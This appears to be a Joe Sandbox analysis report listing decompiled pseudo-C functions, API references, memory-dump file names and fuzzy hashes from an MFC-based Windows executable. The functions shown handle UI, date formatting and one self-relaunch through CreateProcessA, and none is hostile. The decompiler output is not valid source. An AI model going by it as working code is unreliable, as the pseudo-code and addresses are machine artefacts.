#2642.MFC42(00000497,00000001,00000473,?,?,0041BC87,0000047C,0000047D,?,00000497,?,00000474,?,00000473,?,00000470), ref: 0041BEEC
#3092.MFC42(00000496,00000001,00000497,00000001,00000473,?,?,0041BC87,0000047C,0000047D,?,00000497,?,00000474,?,00000473), ref: 0041BEF9
#2642.MFC42(00000496,00000001,00000497,00000001,00000473,?,?,0041BC87,0000047C,0000047D,?,00000497,?,00000474,?,00000473), ref: 0041BF00

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #2642#3092$#4055
String ID:
API String ID: 2023933615-0
Opcode ID: 3094432343f1e68286e43dad7039a6e3512b43301af6399fbf76318f2f400694
Instruction ID: 979f71807a3120244b98ad0fc391a7c8c540084a71a0e6cafe3bd34ae2c53b15
Opcode Fuzzy Hash: 3094432343f1e68286e43dad7039a6e3512b43301af6399fbf76318f2f400694
Instruction Fuzzy Hash: ABD0121174613053A93C32B76D1AA6F0856CFC9A74F05112E72469B1C1ECD80D0241AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040F706, Relevance: 7.5, APIs: 5, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040F706(signed int* __ecx) {
				void* _t23;

				E0043E4E0(0x440381, _t23);
				_push(__ecx);
				 *((intOrPtr*)(_t23 - 0x10)) = __ecx;
				L0043DDD8();
				 *(_t23 - 4) =  *(_t23 - 4) & 0x00000000;
				L0043DDD8();
				 *(_t23 - 4) = 1;
				L0043DDD8();
				 *(_t23 - 4) = 2;
				L0043DDD8();
				 *__ecx =  *__ecx & 0x00000000;
				 *[fs:0x0] =  *((intOrPtr*)(_t23 - 0xc));
				return __ecx;
			}

0x0040f70b
0x0040f710
0x0040f714
0x0040f71a
0x0040f71f
0x0040f726
0x0040f72e
0x0040f732
0x0040f73a
0x0040f73e
0x0040f746
0x0040f74c
0x0040f754

APIs

__EH_prolog.LIBCMT ref: 0040F70B
#540.MFC42(?,?,0040FFBD), ref: 0040F71A
#540.MFC42(?,?,0040FFBD), ref: 0040F726
#540.MFC42(?,?,0040FFBD), ref: 0040F732
#540.MFC42(?,?,0040FFBD), ref: 0040F73E

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #540$H_prolog
String ID:
API String ID: 385474894-0
Opcode ID: 118e89c8bd656a0ee7c45cd921d03e2f783d5cda2873ab6cdd36c1375bc453fa
Instruction ID: 7f3fff88c9a6060fc7e01f34a5421d34d59acfc9c68e3b90631fc1fac2de6346
Opcode Fuzzy Hash: 118e89c8bd656a0ee7c45cd921d03e2f783d5cda2873ab6cdd36c1375bc453fa
Instruction Fuzzy Hash: E6F0A071C00610CBCB26EF96E4027EDB7F4AF18308F00895EA053936D2CBB86A08C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 0040F755, Relevance: 7.5, APIs: 5, Instructions: 23
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E0040F755(intOrPtr __ecx) {
				void* _t14;
				void* _t24;

				_t14 = E0043E4E0(0x4403ad, _t24);
				_push(__ecx);
				 *((intOrPtr*)(_t24 - 0x10)) = __ecx;
				 *(_t24 - 4) = 2;
				L0043DD36();
				 *(_t24 - 4) = 1;
				L0043DD36();
				 *(_t24 - 4) =  *(_t24 - 4) & 0x00000000;
				L0043DD36();
				 *(_t24 - 4) =  *(_t24 - 4) | 0xffffffff;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t24 - 0xc));
				return _t14;
			}

0x0040f75a
0x0040f75f
0x0040f763
0x0040f769
0x0040f770
0x0040f778
0x0040f77c
0x0040f781
0x0040f788
0x0040f78d
0x0040f794
0x0040f79d
0x0040f7a5

APIs

__EH_prolog.LIBCMT ref: 0040F75A
#800.MFC42(?,?,0040FFF7,?,?,00000000), ref: 0040F770
#800.MFC42(?,?,0040FFF7,?,?,00000000), ref: 0040F77C
#800.MFC42(?,?,0040FFF7,?,?,00000000), ref: 0040F788
#800.MFC42(?,?,0040FFF7,?,?,00000000), ref: 0040F794

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$H_prolog
String ID:
API String ID: 948933410-0
Opcode ID: f2d54fb8f1e19156ad55e2047d5d6a3b2eb8c965d108a305ef757253412f0154
Instruction ID: fa49b21865b06008bfd86b72ccb0f1e2ac40f874668d777ff269ff9f2165e01d
Opcode Fuzzy Hash: f2d54fb8f1e19156ad55e2047d5d6a3b2eb8c965d108a305ef757253412f0154
Instruction Fuzzy Hash: 7AF0A071C00650DBC724EF55E5027DDBBB4AF19318F108A4EA063535C2DBBC6B08CA65

Uniqueness

Uniqueness Score: -1.00%

Function 0041F337, Relevance: 7.5, APIs: 5, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E0041F337(void* __eax, void* __ecx) {

				_push(0x421);
				L0043DFA6();
				_push(__eax);
				_push(0x487);
				L0043E066();
				L0043E07E();
				_push(__eax);
				_push(0x488);
				L0043E066();
				L0043E07E();
				return __eax;
			}

0x0041f33b
0x0041f340
0x0041f349
0x0041f34a
0x0041f34f
0x0041f356
0x0041f35b
0x0041f35c
0x0041f363
0x0041f36a
0x0041f371

APIs

#4055.MFC42(00000421,?,-0000006C,0041F331,00000487,00000001,0000047D,00000001), ref: 0041F340
#3092.MFC42(00000487,00000000,00000421,?,-0000006C,0041F331,00000487,00000001,0000047D,00000001), ref: 0041F34F
#2642.MFC42(00000487,00000000,00000421,?,-0000006C,0041F331,00000487,00000001,0000047D,00000001), ref: 0041F356
#3092.MFC42(00000488,00000000,00000487,00000000,00000421,?,-0000006C,0041F331,00000487,00000001,0000047D,00000001), ref: 0041F363
#2642.MFC42(00000488,00000000,00000487,00000000,00000421,?,-0000006C,0041F331,00000487,00000001,0000047D,00000001), ref: 0041F36A

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #2642#3092$#4055
String ID:
API String ID: 2023933615-0
Opcode ID: f3dbdd2160befd96720a4ff40d2f2d029b019cadcc901d40ba252bf5709c9fb3
Instruction ID: 2639641d39459c8651f4fea45481419ab9322e2553ac95ad5fd1ddccea15420d
Opcode Fuzzy Hash: f3dbdd2160befd96720a4ff40d2f2d029b019cadcc901d40ba252bf5709c9fb3
Instruction Fuzzy Hash: 97D09E5174213463A97C32F7691BE5E0866CBC9F64F45142F72059B2D2ECD84D0242BD

Uniqueness

Uniqueness Score: -1.00%

Function 004191EA, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44
processwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004191EA(void* __ecx, void* __eflags) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v88;
				char _v348;
				void* __esi;
				void* _t16;
				void* _t19;

				_t19 = __ecx;
				E0042A660( &_v348, 5, 0);
				memset( &_v88, 0, 0x44);
				_v88.cb = 0x44;
				if(CreateProcessA(0,  &_v348, 0, 0, 0, 0, 0, 0,  &_v88,  &_v20) != 0) {
					PostMessageA( *(L004044C9(_t15, _t19, 0) + 0x20), 0x111, 0xdf, 0);
				}
				_t16 = 1;
				return _t16;
			}

0x004191ea
0x00419200
0x0041920c
0x00419217
0x00419239
0x0041924e
0x0041924e
0x00419256
0x00419259

APIs

Part of subcall function 0042A660: GetModuleFileNameA.KERNEL32(00000000,?,00000103,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A66F
Part of subcall function 0042A660: lstrlenA.KERNEL32(?,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A67C
Part of subcall function 0042A660: lstrlenA.KERNEL32(?,00000000,?,00419205,?,00000005,00000000), ref: 0042A68B
Part of subcall function 0042A660: lstrcatA.KERNEL32(?,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A6A0

memset.MSVCRT ref: 0041920C
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00419231
PostMessageA.USER32 ref: 0041924E

Strings

D, xrefs: 00419217

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: lstrlen$CreateFileMessageModuleNamePostProcesslstrcatmemset
String ID: D
API String ID: 3248123876-2746444292
Opcode ID: ba0d2a22f40231743dad335c73caf42ec4d8e7ef636ac726507e5e302ea1bed6
Instruction ID: e4446a854a9f59742e6da9aa588432f28d4fe446af13b19b3e08c02e28e328fa
Opcode Fuzzy Hash: ba0d2a22f40231743dad335c73caf42ec4d8e7ef636ac726507e5e302ea1bed6
Instruction Fuzzy Hash: 45F09CB25015287AEB20EBD19C0EFDB7B6CDF45704F000062B705F5185E6789648C6F4

Uniqueness

Uniqueness Score: -1.00%

Function 00419674, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E00419674(void* __ecx) {
				void* __esi;
				long _t7;
				void* _t8;
				void* _t10;
				void* _t17;

				_t17 = __ecx;
				L0043DF94();
				_t7 = GetSysColor(0xf);
				_push("Verdana");
				 *(_t17 + 0x158) = _t7;
				 *((intOrPtr*)(_t17 + 0x150)) = 0x2bc;
				 *((intOrPtr*)(_t17 + 0x14c)) = 0xe;
				L0043DDD2();
				_push(1);
				_push(0x808080);
				_push(0x10101);
				_push(0xefefef);
				_push(_t17);
				_push(1);
				_t8 = L00404F47(_t7, _t17 + 0xb4, _t17);
				_push(1);
				_push(0x808080);
				_push(0x10101);
				_push(0xefefef);
				_push(_t17);
				_push(2);
				L00404F47(_t8, _t17 + 0x60, _t17);
				_t10 = 1;
				return _t10;
			}

0x00419678
0x0041967a
0x00419681
0x00419687
0x00419692
0x00419698
0x004196a2
0x004196ac
0x004196b6
0x004196bd
0x004196c3
0x004196c4
0x004196c5
0x004196c6
0x004196ce
0x004196d3
0x004196d5
0x004196d6
0x004196d7
0x004196d8
0x004196d9
0x004196de
0x004196e5
0x004196ea

APIs

#4710.MFC42 ref: 0041967A
GetSysColor.USER32(0000000F), ref: 00419681
#860.MFC42 ref: 004196AC

Strings

Verdana, xrefs: 00419687

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #4710#860Color
String ID: Verdana
API String ID: 99654537-987297809
Opcode ID: a309e88e507152e25b0760b4dbc22f954db3bbeec0023c5049c9c43a9bb807de
Instruction ID: d336a922067e42d1036fd7cc1a44f00c4f32b011d06697dc262961c48fe27f2c
Opcode Fuzzy Hash: a309e88e507152e25b0760b4dbc22f954db3bbeec0023c5049c9c43a9bb807de
Instruction Fuzzy Hash: 53F09C71241B447AD230A762DC46FE37B9CDFC1769F00042EB299962C1CBF53444C664

Uniqueness

Uniqueness Score: -1.00%

Function 004211EB, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E004211EB(intOrPtr __ecx) {
				void* __esi;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				void* _t24;
				intOrPtr* _t34;
				intOrPtr _t37;
				void* _t39;

				_t20 = E0043E4E0(0x442121, _t39);
				_push(__ecx);
				_push(__ecx);
				_t37 = __ecx;
				 *((intOrPtr*)(_t39 - 0x10)) = __ecx;
				 *(_t39 - 4) =  *(_t39 - 4) & 0x00000000;
				_t34 = __ecx + 0x1b8;
				 *((intOrPtr*)(_t39 - 0x14)) = _t34;
				 *_t34 = 0x445440;
				 *(_t39 - 4) = 5;
				L0043DD72();
				 *_t34 = 0x44547c;
				 *(_t39 - 4) = 3;
				_t21 = L00404F36(_t20, __ecx + 0x164, __ecx);
				 *(_t39 - 4) = 2;
				_t22 = L00404F36(_t21, _t37 + 0x110, _t37);
				 *(_t39 - 4) = 1;
				_t23 = L00404F36(_t22, _t37 + 0xbc, _t37);
				 *(_t39 - 4) =  *(_t39 - 4) & 0x00000000;
				_t24 = L00404F36(_t23, _t37 + 0x68, _t37);
				 *(_t39 - 4) =  *(_t39 - 4) | 0xffffffff;
				L0043E04E();
				 *[fs:0x0] =  *((intOrPtr*)(_t39 - 0xc));
				return _t24;
			}

0x004211f0
0x004211f5
0x004211f6
0x004211f8
0x004211fb
0x004211fe
0x00421202
0x00421208
0x0042120b
0x00421213
0x00421217
0x00421222
0x00421228
0x0042122c
0x00421237
0x0042123b
0x00421246
0x0042124a
0x0042124f
0x00421256
0x0042125b
0x00421261
0x0042126b
0x00421273

APIs

__EH_prolog.LIBCMT ref: 004211F0
#2414.MFC42(00000002,?,?,?,00420E6C), ref: 00421217
#641.MFC42(?,?,?,00420E6C), ref: 00421261

Strings

!!D, xrefs: 004211EB

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #2414#641H_prolog
String ID: !!D
API String ID: 912312548-1004561839
Opcode ID: 576ea9901b5aea2dac143cf1b7436eeae3910afb9926ab473c9004a8fa348e7a
Instruction ID: 92f7a0fcd6771769057712b8fb6cdd5dd9fba54cd2aef058bfb8156e80c88354
Opcode Fuzzy Hash: 576ea9901b5aea2dac143cf1b7436eeae3910afb9926ab473c9004a8fa348e7a
Instruction Fuzzy Hash: 8B01D470911785EBE725EBA5C1063DDFBB8AF55308F10459EA052A32C3CBF82B04CB66

Uniqueness

Uniqueness Score: -1.00%

Function 004274E3, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E004274E3(intOrPtr __ecx) {
				intOrPtr _t22;
				void* _t28;

				E0043E4E0(0x442d4e, _t28);
				_push(__ecx);
				_t22 =  *((intOrPtr*)(_t28 + 8));
				 *((intOrPtr*)(_t28 - 0x10)) = __ecx;
				E0040BCF2(__ecx, _t22);
				 *((intOrPtr*)(__ecx + 0x1070)) =  *((intOrPtr*)(_t22 + 0x1070));
				_push(_t22 + 0x1074);
				L0043DD3C();
				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
				_push(_t22 + 0x1078);
				L0043DD3C();
				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
				return __ecx;
			}

0x004274e8
0x004274ed
0x004274f0
0x004274f6
0x004274f9
0x0042750a
0x00427516
0x00427517
0x0042751c
0x00427526
0x0042752d
0x00427539
0x00427541

APIs

__EH_prolog.LIBCMT ref: 004274E8
#535.MFC42(?,?,?,?,?,0042701A,?), ref: 00427517
#535.MFC42(?,?,?,?,?,?,0042701A,?), ref: 0042752D

Strings

N-D, xrefs: 004274E3

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #535$H_prolog
String ID: N-D
API String ID: 3656073097-3571361470
Opcode ID: 1a1a6f58413525e08d920d0ee401738c90dfd408a443bacd302b5cfcae44a98a
Instruction ID: e7e9645546bb46de31f5a3da6648b244fe9be9829d53cd81cffe09f7b0bebaad
Opcode Fuzzy Hash: 1a1a6f58413525e08d920d0ee401738c90dfd408a443bacd302b5cfcae44a98a
Instruction Fuzzy Hash: 60F0BEB2E00940ABC314DB39E805ADAF3B8FF54304F00462FB49693280CBB87945C694

Uniqueness

Uniqueness Score: -1.00%

Function 00429098, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00429098(void* __ecx, intOrPtr _a4, struct _SYSTEMTIME* _a8) {
				int _v8;

				_v8 = 0;
				 *0x455b1c = 0;
				GetDateFormatA(0x400, 0, _a8, "dddd, d MMMM", 0x455b1c, 0x32);
				CharUpperBuffA(0x455b1c, 1);
				_push(0x455b1c);
				L0043DE26();
				return _a4;
			}

0x004290af
0x004290b2
0x004290bd
0x004290c6
0x004290cf
0x004290d0
0x004290da

APIs

GetDateFormatA.KERNEL32(00000400,00000000,?,dddd, d MMMM,00455B1C,00000032,?,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290BD
CharUpperBuffA.USER32(00455B1C,00000001,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290C6
#537.MFC42(00455B1C,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290D0

Strings

dddd, d MMMM, xrefs: 004290A5

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
